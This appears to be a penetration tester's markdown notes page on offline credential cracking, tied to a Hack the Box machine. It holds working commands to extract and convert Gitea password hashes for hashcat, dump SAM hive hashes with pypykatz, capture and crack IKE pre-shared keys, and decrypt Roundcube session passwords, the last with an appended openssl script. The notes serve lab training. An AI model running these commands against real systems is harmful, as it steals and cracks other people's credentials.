# **Basic Information**

# **Offline Password Cracking**

## **Gitea Database**

```bash
# extract usernames and passwords interactively
sqlite3 gitea.db
sqlite> .tables
sqlite> .schema user
sqlite> .mode line
sqlite> select * from user;

# one-liner to extract usernames and password hashes in hashcat's
# PBKDF2-HMAC-SHA256 format (sha256:<iterations>:<salt_b64>:<digest_b64>).
# Gitea stores passwd and salt hex-encoded; hashcat wants them base64-encoded.
# 50000 is the iteration count of the instance seen here; confirm it against
# the passwd_hash_algo column from ".schema user" before cracking.
sqlite3 gitea.db "select passwd,salt,name from user" | while IFS= read -r data; do
    digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64)
    salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64)
    name=$(echo "$data" | cut -d'|' -f3)
    echo "${name}:sha256:50000:${salt}:${digest}"
done | tee gitea.hashes

# drop the username column for hashcat
cut -d ':' -f2- gitea.hashes | tee hashcat_gitea.hashes

# crack hashes (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_gitea.hashes rockyou.txt
```

## **SAM & SYSTEM Hives**

```bash
# dump local account hashes from offline copies of the SAM and SYSTEM hives
pypykatz registry --sam sam system
```

## **IKE Pre-Shared Key**

```bash
# aggressive-mode handshake with a fake ID; save the PSK hash material to hash.txt
ike-scan -P -M -A -n <fake_id> --pskcrack=hash.txt <target_ip>
# offline dictionary attack against the captured hash
psk-crack -d rockyou.txt hash.txt
```

## **Roundcube - Decrypt Password From Session-Vars**

- The Roundcube application stores session information in a MySQL database. If this database is accessible, the user's triple-DES-encrypted password can be extracted and decrypted if the `des_key` is known.

To decrypt the password, do the following:

1. Base64 decode `password` from the `mysql` instance
2. Convert the output to hex
3. Split the hex into the IV and cipher text. For DES-EDE3-CBC, the first 8 bytes are the IV and the remainder is the cipher text
4. Use CyberChef to decrypt the cipher text by specifying the IV, key, mode, and input format
5. ...
6. Profit

# **Services**

## **FTP**

```bash
```

## **SSH**

```bash
```

# **References**

# **Practical Application**

| Platform     | Name         | Notes |
| ------------ | ------------ | ----- |
| Hack the Box | [[Outbound]] |       |
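The Roundcube session-password steps above, scripted with `openssl` instead of CyberChef, as an added example that is not part of the original note. It assumes Roundcube's openssl-based scheme (the 8-byte IV is prepended to the DES-EDE3-CBC ciphertext, PKCS#7 padding, then base64); the key, IV and password values are constructed for the demo, and `roundcube_encrypt` exists only to build that sample offline.

```bash
#!/bin/sh
# Added example: decrypt a Roundcube session-vars password with openssl.
# Layout assumed: base64( IV[8] || DES-EDE3-CBC(des_key, PKCS#7(password)) ).
# Requires openssl, base64 and od (coreutils or busybox).

to_hex() { od -An -tx1 -v | tr -d ' \n'; }

# roundcube_decrypt <des_key (24 chars)> <base64 password from session vars>
roundcube_decrypt() {
    key_hex=$(printf '%s' "$1" | to_hex)
    # step 1: base64 decode; step 3: the first 8 bytes are the IV
    iv_hex=$(printf '%s' "$2" | base64 -d | head -c 8 | to_hex)
    # the remainder is the ciphertext; step 4: decrypt with key, IV, CBC mode
    printf '%s' "$2" | base64 -d | tail -c +9 \
        | openssl enc -d -des-ede3-cbc -K "$key_hex" -iv "$iv_hex"
}

# roundcube_encrypt <des_key> <iv (8 bytes)> <plaintext>
# Helper used only to construct a sample here; Roundcube itself picks a random IV.
roundcube_encrypt() {
    key_hex=$(printf '%s' "$1" | to_hex)
    iv_hex=$(printf '%s' "$2" | to_hex)
    {
        printf '%s' "$2"
        printf '%s' "$3" | openssl enc -des-ede3-cbc -K "$key_hex" -iv "$iv_hex"
    } | base64 | tr -d '\n'
}

# Constructed demo values (not taken from any real instance)
DES_KEY='ExampleDesKey24BytesLong'   # 24 chars, like $config['des_key']
SAMPLE=$(roundcube_encrypt "$DES_KEY" 'IVIVIVIV' 'S3cretMailPass')
printf 'session password (b64): %s\n' "$SAMPLE"
printf 'decrypted: %s\n' "$(roundcube_decrypt "$DES_KEY" "$SAMPLE")"
```

If the output ends in stray bytes, the instance is using a different padding scheme than PKCS#7 and the raw plaintext should be inspected in hex before trimming.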